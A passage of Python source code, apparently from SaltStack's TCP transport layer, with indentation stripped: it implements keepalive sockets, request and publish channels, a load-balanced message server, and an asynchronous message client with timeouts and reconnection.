sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
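# A minimal sketch of how the helper above is typically applied (the option
# values are illustrative, not Salt defaults):
#
#   sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   _set_tcp_keepalive(sock, {
#       'tcp_keepalive': True,
#       'tcp_keepalive_idle': 300,    # seconds of idle time before the first probe
#       'tcp_keepalive_cnt': 4,       # probes sent before the connection is dropped
#       'tcp_keepalive_intvl': 75,    # seconds between probes
#   })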
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via a multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super(LoadBalancerServer, self).__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to keep a local reference to the object because we store it in
# a WeakValueDictionary, which drops the entry as soon as nothing else
# references it; the local name keeps it alive until we return it
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
obj._instance_key = key
loop_instance_map[key] = obj
obj._refcount = 1
obj._refcount_lock = threading.RLock()
else:
with obj._refcount_lock:
obj._refcount += 1
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
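# Illustration of the singleton behaviour implemented above (a sketch, not code
# used by Salt): constructing the channel twice with the same opts on the same
# io_loop yields the same object and only bumps its reference count.
#
#   a = AsyncTCPReqChannel(opts, io_loop=loop)
#   b = AsyncTCPReqChannel(opts, io_loop=loop)
#   assert a is b and a._refcount == 2
#   b.close()   # first close only decrements the refcount
#   a.close()   # last close actually tears the channel down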
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
if self._refcount > 1:
# Decrease refcount
with self._refcount_lock:
self._refcount -= 1
log.debug(
'This is not the last %s instance. Not closing yet.',
self.__class__.__name__
)
return
log.debug('Closing %s instance', self.__class__.__name__)
self._closing = True
self.message_client.close()
# Remove the entry from the instance map so that a closed entry may not
# be reused.
# This forces this operation even if the reference count of the entry
# has not yet gone to zero.
if self.io_loop in self.__class__.instance_map:
loop_instance_map = self.__class__.instance_map[self.io_loop]
if self._instance_key in loop_instance_map:
del loop_instance_map[self._instance_key]
if not loop_instance_map:
del self.__class__.instance_map[self.io_loop]
# pylint: disable=W1701
def __del__(self):
with self._refcount_lock:
# Make sure we actually close no matter if something
# went wrong with our ref counting
self._refcount = 1
try:
self.close()
except socket.error as exc:
if exc.errno != errno.EBADF:
# If its not a bad file descriptor error, raise
raise
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
We can fail too early, for example when the master restarts in the
middle of a minion state execution call.
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
# we may not always get data back; for example, a salt-call ret
# submission is a blind communication: we do not subscribe to return
# events, we just upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
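# Sketch of how this channel is driven from synchronous code, mirroring the
# pattern used in connect_callback() further down (illustrative only):
#
#   req_channel = salt.utils.asynchronous.SyncWrapper(AsyncTCPReqChannel, (opts,))
#   try:
#       reply = req_channel.send(load, timeout=60)
#   finally:
#       del req_channel   # SyncWrapper calls close()/destroy() as appropriate
#
# Inside a coroutine, the channel is used directly and send() is yielded.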
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
finally:
# SyncWrapper will call either close() or destroy(), whichever is available
del req_channel
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
# if this is changed from the default, we assume it was intentional
if int(self.opts.get('publish_port', 4506)) != 4506:
self.publish_port = self.opts.get('publish_port')
# otherwise use the publish_port the master reports
else:
self.publish_port = self.auth.creds['publish_port']
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.publish_port),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = salt.utils.msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
six.reraise(*sys.exc_info())
self._socket.close()
self._socket = None
if hasattr(self.req_server, 'shutdown'):
try:
self.req_server.shutdown()
except Exception as exc:
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
elif hasattr(self.req_server, 'stop'):
try:
self.req_server.stop()
except socket.error as exc:
if exc.errno != 9:
raise
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the listening socket (or, on Windows, the load balancer process) for the request server
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(self.socket_queue,
self.handle_message,
ssl_options=self.opts.get('ssl'))
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self.req_server = SaltMessageServer(self.handle_message,
ssl_options=self.opts.get('ssl'),
io_loop=self.io_loop)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
@tornado.gen.coroutine
def handle_message(self, stream, header, payload):
'''
Handle incoming messages from underlying TCP streams
'''
try:
try:
payload = self._decode_payload(payload)
except Exception:
stream.write(salt.transport.frame.frame_msg('bad load', header=header))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
yield stream.write(salt.transport.frame.frame_msg(
'payload and load must be a dict', header=header))
raise tornado.gen.Return()
try:
id_ = payload['load'].get('id', '')
if str('\0') in id_:
log.error('Payload contains an id with a null byte: %s', payload)
stream.send(self.serial.dumps('bad load: id contains a null byte'))
raise tornado.gen.Return()
except TypeError:
log.error('Payload contains non-string id: %s', payload)
stream.send(self.serial.dumps('bad load: id {0} is not a string'.format(id_)))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
yield stream.write(salt.transport.frame.frame_msg(
self._auth(payload['load']), header=header))
raise tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.write('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
stream.close()
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == 'send':
stream.write(salt.transport.frame.frame_msg(self.crypticle.dumps(ret), header=header))
elif req_fun == 'send_private':
stream.write(salt.transport.frame.frame_msg(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
), header=header))
else:
log.error('Unknown req_fun %s', req_fun)
# always attempt to return an error to the minion
stream.write('Server-side exception handling payload')
stream.close()
except tornado.gen.Return:
raise
except tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error('Connection was unexpectedly closed', exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error('Unexpected exception occurred: %s', exc, exc_info=True)
raise tornado.gen.Return()
class SaltMessageServer(tornado.tcpserver.TCPServer, object):
'''
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
'''
def __init__(self, message_handler, *args, **kwargs):
io_loop = kwargs.pop('io_loop', None) or tornado.ioloop.IOLoop.current()
super(SaltMessageServer, self).__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
self._shutting_down = False
@tornado.gen.coroutine
def handle_stream(self, stream, address):
'''
Handle incoming streams and add messages to the incoming queue
'''
log.trace('Req client %s connected', address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
self.io_loop.spawn_callback(self.message_handler, stream, header, framed_msg['body'])
except tornado.iostream.StreamClosedError:
log.trace('req client disconnected %s', address)
self.remove_client((stream, address))
except Exception as e:
log.trace('other master-side exception: %s', e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
'''
Shutdown the whole server
'''
if self._shutting_down:
return
self._shutting_down = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except socket.error as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
'''
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
'''
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super(LoadBalancerWorker, self).__init__(
message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
self._stop.set()
self.thread.join()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(tornado.tcpclient.TCPClient):
'''
Override _create_stream() in TCPClient to enable keep alive support.
'''
def __init__(self, opts, resolver=None):
self.opts = opts
super(TCPClientKeepAlive, self).__init__(resolver=resolver)
def _create_stream(self, max_buffer_size, af, addr, **kwargs): # pylint: disable=unused-argument
'''
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
'''
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = tornado.iostream.IOStream(
sock,
max_buffer_size=max_buffer_size)
if tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper around SaltMessageClient to avoid blocking while waiting to write data to the socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(SaltMessageClientPool, self).__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
for future in futures:
yield future
raise tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient(object):
'''
Low-level message sending client
'''
def __init__(self, opts, host, port, io_loop=None, resolver=None,
connect_callback=None, disconnect_callback=None,
source_ip=None, source_port=None):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, '_stream') and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (self.io_loop != tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop()
)
self.io_loop.start()
except Exception as e:
log.info('Exception caught in SaltMessageClient.close: %s', str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
'''
Ask for this client to reconnect to the origin
'''
if hasattr(self, '_connecting_future') and not self._connecting_future.done():
future = self._connecting_future
else:
future = tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@tornado.gen.coroutine
def _connect(self):
'''
Try to connect for the rest of time!
'''
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {'source_ip': self.source_ip,
'source_port': self.source_port}
else:
log.warning('If you need a certain source IP/port, consider upgrading to Tornado >= 4.5')
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(self.host,
self.port,
ssl_options=self.opts.get('ssl'),
**kwargs)
self._connecting_future.set_result(True)
break
except Exception as exc:
log.warning('TCP Message Client encountered an exception %r', exc)
yield tornado.gen.sleep(1) # TODO: backoff
#self._connecting_future.set_exception(e)
@tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done() or
self._connecting_future.result() is not True):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(4096, partial=True)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
if six.PY3:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg['head']
body = framed_msg['body']
message_id = header.get('mid')
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error('Got response for message_id %s that we are not tracking', message_id)
except tornado.iostream.StreamClosedError as e:
log.debug('tcp stream to %s:%s closed, unable to recv', self.host, self.port)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if 'detect_mode' in self.opts:
log.info('There was an error trying to use TCP transport; '
'attempting to fallback to another transport')
else:
raise SaltClientError
except Exception as e:
log.error('Exception parsing response', exc_info=True)
for future in six.itervalues(self.send_future_map):
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@tornado.gen.coroutine
def _stream_send(self):
while not self._connecting_future.done() or self._connecting_future.result() is not True:
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception('Unable to find available messageid')
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
'''
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(
SaltReqTimeoutError('Message timed out')
)
def send(self, msg, timeout=None, callback=None, raw=False):
'''
Send given message, and return a future
'''
message_id = self._message_id()
header = {'mid': message_id}
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message_id)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append((message_id, salt.transport.frame.frame_msg(msg, header=header)))
return future
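# --- Hedged usage sketch (editor's addition, not part of the original module) ---
# Shows how SaltMessageClient.send() is typically driven: send() frames the
# message with a 'mid' header, queues it, and returns a Future that
# _stream_return() resolves when a reply carrying the same 'mid' arrives.
# The opts/host/port values below are placeholders; a real request server must
# be listening for the Future to ever resolve.
def _example_send_request():
    import tornado.gen
    import tornado.ioloop

    io_loop = tornado.ioloop.IOLoop.current()
    client = SaltMessageClient({'ssl': None}, '127.0.0.1', 4506, io_loop=io_loop)

    @tornado.gen.coroutine
    def _run():
        # Raises SaltReqTimeoutError if no reply with our 'mid' arrives in 5s
        reply = yield client.send({'cmd': 'ping'}, timeout=5)
        raise tornado.gen.Return(reply)

    try:
        return io_loop.run_sync(_run)
    finally:
        client.close()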
class Subscriber(object):
'''
Client object for use with the TCP publisher server
'''
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
